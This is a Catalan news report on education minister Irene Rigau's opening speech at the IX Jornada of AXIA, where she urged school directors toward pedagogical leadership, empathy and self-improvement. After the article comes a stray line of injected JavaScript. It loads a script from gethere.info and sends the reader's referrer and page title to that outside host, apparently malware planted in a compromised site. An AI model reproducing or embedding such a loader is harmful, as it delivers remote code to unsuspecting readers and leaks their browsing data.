IRENE RIGAU A LA IX JORNADA D’AXIA

La consellera Rigau demana als directors de centres lideratge pedagògic, capacitat d’empatia i diàleg

La consellera d’Ensenyament, Irene Rigau, ha instat als directors de centres educatius “lideratge pedagògic, capacitat d’empatia, diàleg i una faceta fonamental que ho diferencia: la voluntat de superació”. La titular d’Ensenyament ha fet aquesta declaració en el marc de la inauguració de la IX Jornada d’AXIA, Associació de directius de l’educació pública de Catalunya, sota el títol “La direcció a Catalunya: estat de la qüestió”.

La consellera Rigau ha volgut transmetre als directors i directores assistents el missatge d’il·lusió i lideratge en aquest sector, recordant que l’escola ha de ser l’eina per tal d’aconseguir una capacitat de superació de l’alumne: “D’altra manera només prosperarien aquells que en algun moment ja han prosperat, i això no té sentit”.

Segons Rigau, la formació ha de ser un aspecte important en les persones i en la societat, afirmant que “hem de tornar a posar en valor la formació”. Ha assegurat que l’impacte socioeconòmic no és l’únic que afecta, ja que “la millora depèn molt de la mentalitat”.

La consellera d’Ensenyament ha fet una crida perquè “es deixi de parlar de les desigualtats com a únic valor, i enlloc d’això parlem de les potencialitats, de les oportunitats”.

Davant dels directors de centres, la titular d’Ensenyament ha recordat que parlar d’educació és parlar de futur i que parlar de direcció és parlar de capacitació del projecte.

Durant tot el dia la IX Jornada d’AXIA aplega professionals de la direcció de centres, així com membres del Departament d’Ensenyament amb l’objectiu de debatre i analitzar els aspectes que incideixen en la tasca dels directius dels centres. A la inauguració de la jornada també hi ha assistit el director general de Centres Públics, Jordi Roig, i el president d’AXIA, Jaume Prat.


s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;